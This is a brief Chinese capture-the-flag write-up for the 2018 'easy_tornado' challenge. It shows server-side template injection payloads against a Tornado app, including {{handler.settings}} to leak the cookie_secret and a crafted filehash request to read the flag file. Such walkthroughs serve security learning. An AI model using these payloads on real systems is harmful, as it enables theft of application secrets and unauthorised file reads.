[护网杯 2018]easy_tornado 进入页面 分别查看模板注入 /error?msg={{1*2}} 测试过滤 payload:error?msg={{handler.settings}} 得cookie_secret用PHP解码最后 payload:/file?filename=/fllllllllllllag&filehash=e9bebc8c9f90af297419119189d8a9e4 进入得flag 相关文章: 2021-10-29 2021-07-26 2021-07-04 2021-05-30 2021-04-12 2021-09-09 2022-12-23 2022-12-23